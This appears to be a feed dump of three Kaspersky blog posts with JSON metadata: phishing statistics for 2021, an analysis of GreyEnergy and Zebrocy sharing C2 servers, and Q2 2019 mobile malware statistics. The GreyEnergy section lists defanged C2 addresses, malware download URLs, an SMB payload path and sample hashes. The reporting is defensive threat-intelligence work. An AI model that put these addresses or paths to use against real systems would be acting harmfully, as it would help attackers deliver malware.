In total, 8.20% of Kaspersky users in different countries and regions around the world have faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in forth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were R\u00e9union (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nR\u00e9union | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nMost of the phishing websites blocked in 2021 used a .com domain name like in 2020, whose share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. The third row on the list was occupied by the Chinese country-code domain .cn (7.14%). 
The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they're attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. 
The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We observed a spike in phishing activity on WhatsApp in July, when Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility. 
We also observed another brief surge in phishing activity on the week from October 31 through to November 6, 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes \u2014 remaining two of the year's main themes \u2014 were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year. 
Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-09T10:00:28", "type": "securelist", "title": "Spam and phishing in 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2022-02-09T10:00:28", "id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", 
"cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-24T16:53:08", "description": "\n\nIn October 2018, ESET published a [report](<https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf>) describing a set of activity they called GreyEnergy, which is believed to be a successor to the BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.\n\n[Kaspersky Lab ICS CERT](<https://ics-cert.kaspersky.com/>) has identified an overlap between GreyEnergy and a Sofacy subset called [\"Zebrocy\"](<https://securelist.com/a-slice-of-2017-sofacy-activity/83930/>). The Zebrocy activity was named after malware that the Sofacy group has used since mid-November 2015 for the post-exploitation stage of attacks on its victims. 
Zebrocy's targets are widely spread across the Middle East, Europe and Asia and the targets' profiles are mostly government-related.\n\nBoth sets of activity used the same servers at the same time and targeted the same organization.\n\n## **Details**\n\n### **Servers**\n\nIn our private APT Intel report from July 2018 \"Zebrocy implements new VBA anti-sandboxing tricks\", details were provided about different Zebrocy C2 servers, including **193.23.181[.]151**.\n\nIn the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \neae0b8997c82ebd93e999d4ce14dedf5 \na5cbf5a131e84cd2c0a11fca5ddaa50a \nc9e1b0628ac62e5cb01bf1fa30ac8317\n\nThe URL used to download additional data looks as follows:\n\nhxxp://**193.23.181**[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nThis same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a [FireEye report](<https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html>). Details on this attachment are as follows:\n\n * The file (11227eca89cc053fb189fac3ebf27497) with the name \"Seminar.rtf\" exploited CVE-2017-0199\n * \"Seminar.rtf\" downloaded a second stage document from: hxxp://**193.23.181[.]151**/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)\n * The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://**193.23.181[.]151**/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf\n\nAnother server we detected that was used both by Zebrocy and by GreyEnergy is **185.217.0[.]124**. 
Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named \"Seminar.rtf\".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125754/190123-GreyEnergy_overlap-1.png>)\n\n_\"Seminar.rtf\", a GreyEnergy decoy document_\n\nThis document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:\n\n\\\\\\**185.217.0[.]124**\\Doc\\Seminar\\Seminar_2018_1.AO-A\n\nThe following Zebrocy samples use this server as C2:\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \n3803af6700ff4f712cd698cee262d4ac \ne3100228f90692a19f88d9acb620960d\n\nThey retrieve additional data from the following URL:\n\nhxxp://**185.217.0[.]124**/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nIt is worth noting that at least two samples from the above list use both **193.23.181[.]151** and **185.217.0[.]124** as C2s.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125807/190123-GreyEnergy_overlap-2.png>)\n\n_Hosts associated with GreyEnergy and Zebrocy_\n\n### **Attacked company**\n\nAdditionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. 
One of them was attacked in June 2018.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/24083359/190124-GreyEnergy_overlap-3.png>)\n\n_GreyEnergy and Zebrocy overlap_\n\n### **Attack timeframe**\n\nA spearphishing document entitled 'Seminar.rtf', which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125842/190123-GreyEnergy_overlap-4.png>)\n\n_'(28.06.18) Izmeneniya v prikaz PK.doc' Zebrocy decoy document translation: _ \n_'Changes to order, Republic of Kazakhstan'_\n\nThe two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:\n\n * 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018\n * 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018\n\n## **Conclusions**\n\nThe GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge of penetrating its victims' networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.\n\nThough no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. 
In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship's existence.\n\nFor more information about APT reports please contact: intelreports@kaspersky.com \n\nFor more information about ICS threats please contact: [ics-cert@kaspersky.com](<mailto:cs-cert@kaspersky.com>)", "cvss3": {}, "published": "2019-01-24T09:00:47", "type": "securelist", "title": "GreyEnergy\u2019s overlap with Zebrocy", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882"], "modified": "2019-01-24T09:00:47", "id": "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "href": "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-08-19T18:27:50", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.\n * 217,843,293 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 228,206 users.\n * Ransomware attacks were defeated on the computers of 232,292 unique users.\n * Our File Anti-Virus detected 240,754,063 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 753,550 malicious installation packages\n * 13,899 installation packages for mobile banking Trojans\n * 23,294 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ2 2019 will be remembered for several 
events.\n\nFirst, we uncovered a large-scale [financial threat by the name of Riltok](<https://securelist.com/mobile-banker-riltok/91374/>), which targeted clients of not only major Russian banks, but some foreign ones too.\n\nSecond, we detected the new Trojan.AndroidOS.MobOk malware, tasked with stealing money from mobile accounts through exploiting WAP-Click subscriptions. After infection, web activity on the victim device went into overdrive. In particular, the Trojan opened specially created pages, bypassed their CAPTCHA system using a third-party service, and then clicked on the necessary buttons to complete the subscription.\n\nThird, we repeated our [study](<https://securelist.com/beware-of-stalkerware/90264/>) of commercial spyware, a.k.a. stalkerware. And although such software is not malicious in the common sense of the word, it does entail certain risks for victims. So as of April 3, 2019, Kaspersky mobile products for Android notify users of all known commercial spyware.\n\nFourth, we managed to discover a new type of adware app (AdWare.AndroidOS.KeepMusic.a and AdWare.AndroidOS.KeepMusic.b verdicts) that bypasses operating system restrictions on apps running in the background. To stop its thread being terminated, one such adware app launches a music player and plays a silent file. The operating system thinks that the user is listening to music, and does not end the process, which is not displayed on the main screen of the device. At this moment, the device is operating as part of a botnet, supposedly showing ads to the victim. \"Supposedly\" because ads are also shown in background mode, when the victim might not be using the device.\n\nFifth, our attention was caught by the Hideapp family of Trojans. 
These Trojans spread very actively in Q2, including by means of a time-tested distribution mechanism: antivirus solution logos and porn apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153149/it-threat-evolution-q2-2019-statistics-1.png>)\n\nFinally, in some versions, the Trojan creators revealed a less-than-positive attitude to managers of one of Russia's largest IT companies:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153203/it-threat-evolution-q2-2019-statistics-2.png>)\n\n### Mobile threat statistics\n\nIn Q2 2019, Kaspersky detected 753,550 malicious installation packages, which is 151,624 fewer than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153226/it-threat-evolution-q2-2019-statistics-3.png>)\n\nWhat's more, this is almost 1 million fewer than the number of malicious installation packages detected in Q2 2018. Over the course of this year, we have seen a steady decline in the amount of new mobile malware. The drop is the result of less cybercriminal activity in adding members to the most common families. \n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q1 and Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153256/it-threat-evolution-q2-2019-statistics-4.png>)\n\nAmong all the threats detected in Q2 2019, the lion's share went to potentially unsolicited RiskTool apps with 41.24%, which is 11 p.p. more than in the previous quarter. 
The malicious objects most frequently encountered came from the RiskTool.AndroidOS.Agent family (33.07% of all detected threats in this class), RiskTool.AndroidOS.Smssend (15.68%), and RiskTool.AndroidOS.Wapron (14.41%).\n\nIn second place are adware apps, their share having increased by 2.16 p.p. to 18.71% of all detected threats. Most often, adware belonged to the AdWare.AndroidOS.Ewind family (26.46% of all threats in this class), AdWare.AndroidOS.Agent (23.60%), and AdWare.AndroidOS.MobiDash (17.39%).\n\nTrojan-class malware (11.83%) took third place, with its share for the quarter climbing by 2.31 p.p. The majority of detected files belonged to the Trojan.AndroidOS.Boogr family (32.42%) \u2013 this verdict was given to Trojans detected with machine-learning tools. Next come the Trojan.AndroidOS.Hiddapp (24.18%), Trojan.AndroidOS.Agent (14.58%), and Trojan.AndroidOS.Piom (9.73%) families. Note that Agent and Piom are aggregating verdicts that cover a range of Trojan specimens from various developers.\n\nThreats in the Trojan-Dropper class (10.04%) declined noticeably, shedding 15 p.p. Most of the files we detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (71% of all detected threats in this class), while no other family claimed more than 3%. A typical member of the Wapnor family consists of a random pornographic image, a polymorphic dropper, and a unique executable file. The task of the malware is to sign the victim up to a WAP subscription.\n\nIn Q2 2019, the share of detected mobile bankers slightly decreased: 1.84% versus 3.21% in Q1. The drop is largely due to a decrease in the generation of Trojans in the [Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) family. 
The most frequently created objects belonged to the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/the-android-trojan-svpeng-now-capable-of-mobile-phishing/57301/>) (30.79% of all detected mobile bankers), Trojan-Banker.AndroidOS.Wroba (17.16%), and Trojan-Banker.AndroidOS.Agent (15.70%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs related to RiskTool or adware._\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.37 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.31 \n3 | DangerousObject.AndroidOS.GenericML | 5.66 \n4 | Trojan.AndroidOS.Hiddapp.cr | 4.77 \n5 | Trojan.AndroidOS.Hiddapp.ch | 4.17 \n6 | Trojan.AndroidOS.Hiddapp.cf | 2.81 \n7 | Trojan.AndroidOS.Hiddad.em | 2.53 \n8 | Trojan-Dropper.AndroidOS.Lezok.p | 2.16 \n9 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.08 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.93 \n11 | Trojan-Banker.AndroidOS.Asacub.snt | 1.92 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.91 \n13 | Trojan.AndroidOS.Hiddapp.cg | 1.89 \n14 | Trojan.AndroidOS.Dvmap.a | 1.88 \n15 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.86 \n16 | Trojan.AndroidOS.Agent.rt | 1.81 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.58 \n18 | Trojan.AndroidOS.Fakeapp.bt | 1.58 \n19 | Trojan.AndroidOS.Agent.eb | 1.49 \n20 | Exploit.AndroidOS.Lotoor.be | 1.46 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._\n\nAs per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (44.77%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. 
This is basically how the latest malicious programs are detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (11.31%) and DangerousObject.AndroidOS.GenericML (5.66%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nFourth, fifth, sixth, seventh, and thirteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to secretly download ads onto the infected device. If the user detects the adware app, the Trojan does not prevent its deletion, but re-installs the app at the first opportunity.\n\nEighth position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.16%). This Trojan displays persistent ads, steals money through SMS subscriptions, and inflates hit counters for apps on various platforms.\n\nNinth and fifteenth places were taken by members of the Hqwar dropper family (2.08% and 1.86%, respectively); this malware most often conceals banking Trojans.\n\nTenth and eleventh places went to members of the Asacub family of financial cyberthreats: Trojan-Banker.AndroidOS.Asacub.a (1.93%) and Trojan-Banker.AndroidOS.Asacub.snt (1.92%). 
Like the Hqwar droppers, this family lost a lot of ground in Q2 2019.\n\n### Geography of mobile threats\n\n_Geography of mobile malware infection attempts, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153325/it-threat-evolution-q2-2019-statistics-5.png>)\n\n#### Top 10 countries by share of users attacked by mobile malware\n\n| Country* | %** \n---|---|--- \n1 | Iran | 28.31 \n2 | Bangladesh | 28.10 \n3 | Algeria | 24.77 \n4 | Pakistan | 24.00 \n5 | Tanzania | 23.07 \n6 | Nigeria | 22.69 \n7 | India | 21.65 \n8 | Indonesia | 18.13 \n9 | Sri Lanka | 15.96 \n10 | Kenya | 15.38 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country._\n\nAt the head of Q2's Top 10 countries by share of attacked users is Iran (28.31%), which took second place in this rating in Q1 2019. Iran displaced Pakistan (24%), which now occupies fourth position.\n\nMost often, users of Kaspersky security solutions in Iran encountered the Trojan.AndroidOS.Hiddapp.bn adware Trojan (21.08%) as well as the potentially unwanted apps RiskTool.AndroidOS.FakGram.a (12.50%), which seeks to intercept messages in Telegram, and RiskTool.AndroidOS.Dnotua.yfe (12.29%).\n\nLike Iran, Bangladesh (28.10%) rose one position in our Top 10. 
Most often, users in Bangladesh came across various adware apps, including AdWare.AndroidOS.Agent.f (35.68%), AdWare.AndroidOS.HiddenAd.et (14.88%), and AdWare.AndroidOS.Ewind.h (9.65%).\n\nThird place went to Algeria (24.77%), where users of Kaspersky mobile solutions most often ran into the AdWare.AndroidOS.HiddenAd.et (27.15%), AdWare.AndroidOS.Agent.f (14.16%), and AdWare.AndroidOS.Oimobi.a (8.04%) adware apps.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **13,899** installation packages for mobile banking Trojans, down to nearly half the number recorded in Q1 2019.\n\nThe largest contribution was made by the creators of the Svpeng family of Trojans: 30.79% of all detected banking Trojans. Trojan-Banker.AndroidOS.Wroba (17.16%) and Trojan-Banker.AndroidOS.Agent (15.70%) came second and third, respectively. The much-hyped Asacub Trojan (11.98%) managed only fifth.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153349/it-threat-evolution-q2-2019-statistics-6.png>)\n\n**Top 10 mobile banking Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 13.64 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 13.61 \n3 | Trojan-Banker.AndroidOS.Svpeng.ak | 13.51 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 9.90 \n5 | Trojan-Banker.AndroidOS.Agent.ep | 9.37 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.75 \n7 | Trojan-Banker.AndroidOS.Faketoken.q | 4.18 \n8 | Trojan-Banker.AndroidOS.Asacub.cs | 4.18 \n9 | Trojan-Banker.AndroidOS.Agent.eq | 3.81 \n10 | Trojan-Banker.AndroidOS.Faketoken.z | 3.13 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked by banking threats._\n\nAlmost half of our Top 10 mobile bankers in Q2 2019 is made up of modifications of the Trojan-Banker.AndroidOS.Asacub Trojan: four positions out of ten. 
However, the distribution bursts of this family that we registered last quarter were not repeated this time.\n\nAs in Q1, Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep made it into the Top 10; however, they ceded the highest positions to the Svpeng family of Trojans, which is considered one of the longest-running in existence.\n\n_Geography of mobile banking threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153417/it-threat-evolution-q2-2019-statistics-7.png>)\n\n#### Top 10 countries by share of users attacked by mobile banking Trojans:\n\n| Country* | %** \n---|---|--- \n1 | South Africa | 0.64% \n2 | Russia | 0.31% \n3 | Tajikistan | 0.21% \n4 | Australia | 0.17% \n5 | Turkey | 0.17% \n6 | Ukraine | 0.13% \n7 | Uzbekistan | 0.11% \n8 | Korea | 0.11% \n9 | Armenia | 0.10% \n10 | India | 0.10% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q2 2019, South Africa (0.64%) climbed to first place, up from fourth in the previous quarter. 
In 97% of cases, users in that country encountered Trojan-Banker.AndroidOS.Agent.dx.\n\nSecond place was claimed by Russia (0.31%), where our solutions most often detected members of the Asacub and Svpeng families: Trojan-Banker.AndroidOS.Asacub.a (14.03%), Trojan-Banker.AndroidOS.Asacub.snt (13.96%), and Trojan-Banker.AndroidOS.Svpeng.ak (13.95%).\n\nThird place belongs to Tajikistan (0.21%), where Trojan-Banker.AndroidOS.Faketoken.z (35.96%), Trojan-Banker.AndroidOS.Asacub.a (12.92%), and Trojan-Banker.AndroidOS.Grapereh.j (11.80%) were encountered most frequently.\n\n### Mobile ransomware Trojans\n\nIn Q2 2019, we detected **23,294** installation packages for mobile Trojan ransomware, which is 4,634 fewer than last quarter.\n\n_Number of installation packages for mobile banking Trojans, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153440/it-threat-evolution-q2-2019-statistics-8.png>)\n\n#### Top 10 mobile ransomware Trojans\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 43.90 \n2 | Trojan-Ransom.AndroidOS.Rkor.i | 11.26 \n3 | Trojan-Ransom.AndroidOS.Rkor.h | 7.81 \n4 | Trojan-Ransom.AndroidOS.Small.as | 6.41 \n5 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.92 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 3.35 \n7 | Trojan-Ransom.AndroidOS.Fusob.h | 2.48 \n8 | Trojan-Ransom.AndroidOS.Small.o | 2.46 \n9 | Trojan-Ransom.AndroidOS.Pigetrl.a | 2.45 \n10 | Trojan-Ransom.AndroidOS.Small.ce | 2.22 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._\n\nIn Q2 2019, the most widespread family of ransomware Trojans was Svpeng: three positions in the Top 10.\n\n_Geography of mobile ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153507/it-threat-evolution-q2-2019-statistics-9.png>)\n\n#### Top 10 countries by share of users attacked 
by mobile ransomware Trojans:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.58 \n2 | Kazakhstan | 0.39 \n3 | Iran | 0.27 \n4 | Pakistan | 0.16 \n5 | Saudi Arabia | 0.10 \n6 | Mexico | 0.09 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Singapore | 0.05 \n10 | Indonesia | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)_ \n_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nThe leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.58%), Kazakhstan (0.39%), and Iran (0.27%).\n\n## Attacks on Apple macOS\n\nQ2 witnessed several interesting events, three of which deserve special attention.\n\nA [vulnerability](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>) was discovered in the macOS operating system allowing Gatekeeper and XProtect scans to be bypassed. Exploitation requires creating an archive with a symbolic link to the shared NFS folder containing the file. When the archive is opened, the file from the shared NFS folder is automatically downloaded by the system without any checks. The first malware exploiting this vulnerability was not long in coming; however, all the detected specimens were more likely test versions than actual malware.\n\nVulnerabilities detected in the Firefox browser ([CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>), [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>)) allowed arbitrary code to be executed and the sandbox to be escaped. After this information was made public, the first exploitations occurred. 
